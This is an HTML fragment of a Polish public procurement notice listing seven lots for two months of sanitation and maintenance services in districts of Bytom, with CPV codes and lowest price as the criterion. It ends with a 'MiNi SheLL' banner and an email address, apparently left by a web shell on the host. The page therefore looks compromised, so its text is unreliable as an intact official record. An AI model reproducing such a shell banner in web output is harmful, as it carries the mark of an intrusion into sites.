<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia  - Rejon I.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia - Rejon II.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia - Rejon III.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia - IV.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia - Rejon V.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia - Rejon VI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych
na terenie miasta Bytomia - Rejon VII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com